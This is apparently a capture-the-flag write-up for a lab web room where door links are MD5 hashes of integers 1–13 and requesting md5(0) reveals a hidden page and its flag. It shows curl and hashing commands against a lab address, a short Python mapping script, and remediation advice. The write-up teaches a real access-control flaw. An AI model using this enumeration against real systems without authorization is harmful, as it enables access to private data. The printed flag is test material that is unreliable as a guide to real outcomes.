Case file

MD5 room-id IDOR and missing zero index path

Foundations web engagement: corridor door links used MD5 hashes of sequential integers; rooms 1–13 were linked, md5(0) was omitted from the UI but directly addressable and returned the secret.

Foundations12 minIDOR · Web Enumeration · Hashing
01

Engagement summary

View-source revealed MD5 path segments for doors 1–13; hashing 0 produced the missing route that served the flag.

CORRIDOR rendered a hallway of doors whose hrefs were 32-character hex strings. Source inspection showed each link as /<md5>. Online and offline MD5 lookups mapped the set to integers 1 through 13 — room 0 was absent from the HTML but not from the application. Computing md5(0) = cfcd208495d565ef66e7dff9f98764da and requesting that path returned the engagement artifact. Classic insecure direct object reference: authorization keyed on an guessable identifier with no access control behind sequential IDs.

Business impact

Hashing a sequential ID does not grant confidentiality. Attackers reconstruct the mapping and probe omitted indices. Use non-guessable identifiers (UUIDv4), enforce object-level authorization, and never rely on UI omission as an ACL.

02

Hash map reconstruction and md5(0) request

Identified MD5 of 1–13 from door links; requested MD5 of 0 for the hidden room.

OPERATOR · IDOR

savvy@lab:~$ curl -s http://10.10.10.10/ | grep -oE '[a-f0-9]{32}' | sort -u

c4ca4238a0b923820dcc509a6f75849b # md5(1) ... c51ce410c124a10e0db5e4b97fc2af39 # md5(13)

savvy@lab:~$ echo -n 0 | md5sum

cfcd208495d565ef66e7dff9f98764da

savvy@lab:~$ curl -s http://10.10.10.10/cfcd208495d565ef66e7dff9f98764da

flag{2477ef02448ad9156661ac40a6b8862e}

MAPPING CHECK

corridor_idor.py

import hashlib

for i in range(0, 14):
    print(i, hashlib.md5(str(i).encode()).hexdigest())

Remediation

Replace predictable path IDs with opaque tokens. Authorize every object fetch server-side against the caller’s session. Soft-delete or hide resources in the data layer — not by omitting links from HTML.